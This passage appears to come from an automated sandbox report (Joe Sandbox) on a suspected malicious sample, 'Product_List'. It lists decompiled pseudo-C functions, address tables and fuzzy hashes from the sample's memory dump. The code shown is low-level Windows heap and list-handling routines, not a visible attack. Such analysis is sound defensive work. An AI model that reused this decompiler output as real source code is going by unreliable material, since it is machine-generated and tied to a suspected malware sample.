                                                      0x017800d5
                                                      0x017800d9
                                                      0x017cc03d
                                                      0x017cc046
                                                      0x017cc046
                                                      0x017800df
                                                      0x017800e2
                                                      0x017800ea
                                                      0x017800ef
                                                      0x017800f2
                                                      0x017800f6
                                                      0x01780111
                                                      0x01780117
                                                      0x01780117
                                                      0x00000000
                                                      0x017800f6
                                                      0x017800d0
                                                      0x017800d0
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a645faf9b8b3b19c607080fe9c5694db7d49fb80426ef80d1480194dcb1f73ba
                                                      • Instruction ID: 2fd01fe4022b7d5c123e9829bb0a67edc65f79bb675fba168c158c7e290657d8
                                                      • Opcode Fuzzy Hash: a645faf9b8b3b19c607080fe9c5694db7d49fb80426ef80d1480194dcb1f73ba
                                                      • Instruction Fuzzy Hash: D531BD31241B04CFD722DF28C844B9AF7E5FF89714F1446ADE59A87B90EB35A806CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A90AF Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E017A90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(L017BD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0179E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01784620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E017AF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0179A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                      0x017a90af
                                                      0x017a90b8
                                                      0x017a90bb
                                                      0x017a90bf
                                                      0x017a90c2
                                                      0x017a90c2
                                                      0x017a90c8
                                                      0x017a90cb
                                                      0x017a90cd
                                                      0x017e14d7
                                                      0x017e14eb
                                                      0x017e14eb
                                                      0x00000000
                                                      0x017e14eb
                                                      0x017e14db
                                                      0x017e14e6
                                                      0x00000000
                                                      0x017e14f2
                                                      0x017e14e8
                                                      0x00000000
                                                      0x017e14e8
                                                      0x017a90d8
                                                      0x017a90da
                                                      0x017a90dd
                                                      0x017a90e5
                                                      0x00000000
                                                      0x017a9139
                                                      0x017a90fa
                                                      0x017a90fe
                                                      0x017a9142
                                                      0x00000000
                                                      0x017a9142
                                                      0x017a9104
                                                      0x017a9107
                                                      0x017a910b
                                                      0x017a9110
                                                      0x017a9118
                                                      0x017a9147
                                                      0x017a9148
                                                      0x017a914f
                                                      0x017a9150
                                                      0x017a9151
                                                      0x017a9152
                                                      0x017a9156
                                                      0x017a915d
                                                      0x017a9160
                                                      0x017a9168
                                                      0x017a916c
                                                      0x017a91bc
                                                      0x017a91be
                                                      0x00000000
                                                      0x017a91be
                                                      0x017a916e
                                                      0x017a9173
                                                      0x017a9176
                                                      0x00000000
                                                      0x00000000
                                                      0x017a917c
                                                      0x017a9180
                                                      0x017a91b5
                                                      0x00000000
                                                      0x017a91b5
                                                      0x017a9182
                                                      0x017a9185
                                                      0x017a9189
                                                      0x00000000
                                                      0x00000000
                                                      0x017a918e
                                                      0x017a9190
                                                      0x017a9198
                                                      0x00000000
                                                      0x00000000
                                                      0x017a91a0
                                                      0x00000000
                                                      0x017a91ad
                                                      0x017a91ad
                                                      0x017a91b0
                                                      0x017a91b1
                                                      0x00000000
                                                      0x017a9185
                                                      0x017a911a
                                                      0x017a911c
                                                      0x017a911f
                                                      0x017a9125
                                                      0x017a9127
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction ID: febd893b73c4320e9616c84cf4ab4ced9741babd01adb55b6cb0435e4599d046
                                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction Fuzzy Hash: E2219571A00205EFDB21DF59C844E9AFBF8EB94354F54856EEA4597200D330ED10CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01793B7A Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E01793B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x18584c4; // 0x0
				_v12 = 1;
				_v8 =  *0x18584c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18584c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E017AAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E017AFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18584c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x18584c4; // 0x0
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                      0x01793b89
                                                      0x01793b96
                                                      0x01793ba1
                                                      0x01793bab
                                                      0x01793bb5
                                                      0x01793bb9
                                                      0x017d6298
                                                      0x01793bbf
                                                      0x01793bc2
                                                      0x01793bc3
                                                      0x01793bc9
                                                      0x01793bca
                                                      0x01793bcc
                                                      0x01793bcd
                                                      0x01793bd4
                                                      0x01793bd6
                                                      0x01793bdb
                                                      0x01793bea
                                                      0x01793bf7
                                                      0x01793bfb
                                                      0x01793bff
                                                      0x01793c09
                                                      0x01793c0a
                                                      0x01793c0b
                                                      0x01793c0f
                                                      0x01793c14
                                                      0x01793c18
                                                      0x01793c18
                                                      0x01793bfb
                                                      0x01793c1b
                                                      0x01793c30
                                                      0x01793c30
                                                      0x01793c3d

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f33325c5444d1b2fe5e9bc1c3b0e2e210376dea321b120cd9a97c4d12ba61c5
                                                      • Instruction ID: f76966ce302ebc5726031b8d71f932f8915e2a4b695c31cac9337277e92db88c
                                                      • Opcode Fuzzy Hash: 8f33325c5444d1b2fe5e9bc1c3b0e2e210376dea321b120cd9a97c4d12ba61c5
                                                      • Instruction Fuzzy Hash: 7121D472600109AFCB10DF98DD81F6AFBBDFB41308F150069EA05AB251D375EE05CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0179FD9B Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E0179FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						L017776E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                      0x0179fd9b
                                                      0x0179fda0
                                                      0x0179fda1
                                                      0x0179fdab
                                                      0x0179fdad
                                                      0x0179fdb0
                                                      0x0179fdb8
                                                      0x0179fe0f
                                                      0x0179fde6
                                                      0x0179fde9
                                                      0x0179fdec
                                                      0x017dc0c0
                                                      0x0179fdfe
                                                      0x0179fe06
                                                      0x0179fe06
                                                      0x017dc0c8
                                                      0x0179fe2d
                                                      0x0179fe2d
                                                      0x00000000
                                                      0x0179fe2d
                                                      0x017dc0d1
                                                      0x017dc0e0
                                                      0x017dc0e5
                                                      0x017dc0e5
                                                      0x017dc0e8
                                                      0x00000000
                                                      0x017dc0e8
                                                      0x0179fdf4
                                                      0x00000000
                                                      0x00000000
                                                      0x0179fdf6
                                                      0x0179fdfa
                                                      0x0179fe1a
                                                      0x0179fe1f
                                                      0x0179fe1f
                                                      0x0179fdfc
                                                      0x00000000
                                                      0x0179fdfc
                                                      0x0179fdcc
                                                      0x0179fdd0
                                                      0x0179fe26
                                                      0x00000000
                                                      0x0179fe26
                                                      0x0179fdd8
                                                      0x0179fddb
                                                      0x0179fddd
                                                      0x0179fde0
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction ID: e693ed044bb77f0d07afa02e061083279773a55af54ac7f17a6e9831660305e7
                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction Fuzzy Hash: 37217972A40A45DBDB35CF0DE940A66FBE5EB98B10F2481AEE959C7615D730AC44CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0179B390 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E0179B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01782280(_t12, 0x1858608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E017A00C2(0x1858608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                      0x0179b395
                                                      0x0179b3a2
                                                      0x0179b3a5
                                                      0x0179b3aa
                                                      0x0179b3b2
                                                      0x0179b3ba
                                                      0x0179b3bd
                                                      0x0179b3c0
                                                      0x0179b3c4
                                                      0x0179b3c9
                                                      0x017da3e9
                                                      0x017da3ed
                                                      0x017da3f0
                                                      0x017da3ff
                                                      0x017da403
                                                      0x017da409
                                                      0x00000000
                                                      0x00000000
                                                      0x017da40b
                                                      0x017da40b
                                                      0x017da40f
                                                      0x017da415
                                                      0x017da423
                                                      0x017da423
                                                      0x017da415
                                                      0x0179b3d1
                                                      0x0179b3e8
                                                      0x0179b3e8
                                                      0x0179b3d9

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 256dfc90e84bb0a99f97df400a9eb3175826bd0834ab7aee8e23e6e7183c8973
                                                      • Instruction ID: 125bfd255286399fc8ef2d1cb438f8b55a0e6d3aaa52c5d776415a7eec1a1565
                                                      • Opcode Fuzzy Hash: 256dfc90e84bb0a99f97df400a9eb3175826bd0834ab7aee8e23e6e7183c8973
                                                      • Instruction Fuzzy Hash: 02116B333051109FCB19DA19AD81A2BF2A7FBD5330B250139DE16C7380CD319D06C794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01769240 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E01769240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x183f708);
				E017BD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E017A95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E017A95D0();
				_t33 =  *0x18584c4; // 0x0
				L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x18584c4; // 0x0
				L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x18584c4; // 0x0
				E01782280(L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18586b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E017A95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E017A95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01769325();
					_t50 =  *0x18584c4; // 0x0
					return E017BD0D1(L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                      0x01769240
                                                      0x01769242
                                                      0x01769247
                                                      0x0176924c
                                                      0x0176924e
                                                      0x01769255
                                                      0x01769257
                                                      0x0176925a
                                                      0x0176925f
                                                      0x0176925f
                                                      0x01769266
                                                      0x01769271
                                                      0x01769276
                                                      0x01769279
                                                      0x0176927e
                                                      0x01769295
                                                      0x0176929a
                                                      0x017692b1
                                                      0x017692b6
                                                      0x017692d7
                                                      0x017692dc
                                                      0x017692e0
                                                      0x017692e6
                                                      0x017692e8
                                                      0x017692ee
                                                      0x01769332
                                                      0x01769333
                                                      0x01769337
                                                      0x01769338
                                                      0x0176933a
                                                      0x0176933a
                                                      0x0176933d
                                                      0x01769342
                                                      0x01769342
                                                      0x01769345
                                                      0x01769349
                                                      0x0176934e
                                                      0x01769352
                                                      0x01769357
                                                      0x017692f4
                                                      0x017692f4
                                                      0x017692f6
                                                      0x017692f9
                                                      0x01769300
                                                      0x01769306
                                                      0x01769324
                                                      0x01769324

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: cb5da094a488697d3e0c51a89ea67720ceaee4cd6d2743e119484d9328bb5ac3
                                                      • Instruction ID: 6175ec0fc8e1848e7251ab2cd859da574a634857a61a3f6846469e20e4552269
                                                      • Opcode Fuzzy Hash: cb5da094a488697d3e0c51a89ea67720ceaee4cd6d2743e119484d9328bb5ac3
                                                      • Instruction Fuzzy Hash: C4217831041641DFC322FF29CA44F59BBF9FF18308F14456CA14A866A6CB38EA41CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017F4257 Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E017F4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x18408d0);
				E017BD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E017F41E8(__ebx, __edi, __ecx, _t39);
				L0177EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x18587e4;
					_t18 =  *0x18587e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1855cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x18587e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x18587e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01767055(_t31 + 0xfffffff8);
								_t24 =  *0x18587e0; // 0x0
								_t18 = _t24 - 1;
								 *0x18587e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1855cd0;
				if( *0x1855cd0 <= 0) {
					L01767055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x18587e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x18587e8 = _t30;
						 *0x18587e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E017BD0D1(L017F4320());
			}















                                                      0x017f4257
                                                      0x017f4257
                                                      0x017f4257
                                                      0x017f4259
                                                      0x017f425e
                                                      0x017f4263
                                                      0x017f4265
                                                      0x017f4273
                                                      0x017f4278
                                                      0x017f427c
                                                      0x017f427f
                                                      0x017f4281
                                                      0x017f4287
                                                      0x017f42d7
                                                      0x017f42d7
                                                      0x017f42da
                                                      0x017f428d
                                                      0x017f428d
                                                      0x017f428f
                                                      0x017f4292
                                                      0x017f4297
                                                      0x017f429c
                                                      0x017f42a0
                                                      0x017f42a6
                                                      0x017f42a8
                                                      0x017f42ae
                                                      0x017f42b3
                                                      0x00000000
                                                      0x017f42ba
                                                      0x017f42ba
                                                      0x017f42bf
                                                      0x017f42c5
                                                      0x017f42ca
                                                      0x017f42cf
                                                      0x017f42d0
                                                      0x00000000
                                                      0x017f42d0
                                                      0x017f42b3
                                                      0x00000000
                                                      0x017f42a6
                                                      0x017f429c
                                                      0x017f42dc
                                                      0x017f42dc
                                                      0x017f42e3
                                                      0x017f4309
                                                      0x017f42e5
                                                      0x017f42e5
                                                      0x017f42e8
                                                      0x017f42ee
                                                      0x017f42f0
                                                      0x00000000
                                                      0x017f42f2
                                                      0x017f42f2
                                                      0x017f42f4
                                                      0x017f42f7
                                                      0x017f42f9
                                                      0x017f4300
                                                      0x017f4300
                                                      0x017f42f0
                                                      0x017f430e
                                                      0x017f431f

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e2f4ea424514bc702a9638aebabdcc649c66acf937c08fffa65563bc83b74af
                                                      • Instruction ID: de13de0148d7b1f2b743638707c4a45d979e8fb9cc01fe4793e9d177e923575d
                                                      • Opcode Fuzzy Hash: 4e2f4ea424514bc702a9638aebabdcc649c66acf937c08fffa65563bc83b74af
                                                      • Instruction Fuzzy Hash: F0215879500701CFCB25DF69D144A56FBB1FB86358B5082AEC2068B399DB399691CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01792397 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 34%
                                                      			E01792397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x185848c != 0) {
					L0178FAD0(0x1858610);
					if( *0x185848c == 0) {
						E0178FA00(0x1858610, _t19, _t27, 0x1858610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01792581(0x1858610, 0x17450a0, _t26, _t27, _t28);
						E0178FA00(0x1858610, 0x17450a0, _t27, 0x1858610);
					}
				} else {
					L1:
					_t11 =  *0x1858614; // 0x0
					if(_t11 == 0) {
						_t11 = E017A4886(0x1741088, 1, 0x1858614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01792581(0x1858610, (_t11 << 4) + 0x1745070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                      0x017923b0
                                                      0x017923b6
                                                      0x01792409
                                                      0x01792415
                                                      0x017d5ae9
                                                      0x00000000
                                                      0x0179241b
                                                      0x0179241b
                                                      0x0179241d
                                                      0x01792427
                                                      0x0179242e
                                                      0x01792430
                                                      0x01792430
                                                      0x017923b8
                                                      0x017923b8
                                                      0x017923b8
                                                      0x017923bf
                                                      0x017923fc
                                                      0x017923fc
                                                      0x017923c1
                                                      0x017923c3
                                                      0x017923d0
                                                      0x017923d8
                                                      0x017923d8
                                                      0x017923dc
                                                      0x017923de
                                                      0x017923e1
                                                      0x017923e1
                                                      0x017923ec

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 912857cedfdc1b0917748449104f5e6034cdb15e99d6fa82dbb9472eab0dc139
                                                      • Instruction ID: f8de3ad8f21fabdce05662aa62711f73502dc5ec7710ec65876068c206a28878
                                                      • Opcode Fuzzy Hash: 912857cedfdc1b0917748449104f5e6034cdb15e99d6fa82dbb9472eab0dc139
                                                      • Instruction Fuzzy Hash: DE112B3174430177EB30B63ABC88B15F6D8FBA1660F14406BFA02D7256CAB4E9488B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0176C962 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 42%
                                                      			E0176C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x185d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					L0177EEF0(0x18570a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(L017EF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0177EB70(_t29, 0x18570a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return L017AB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E017EF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
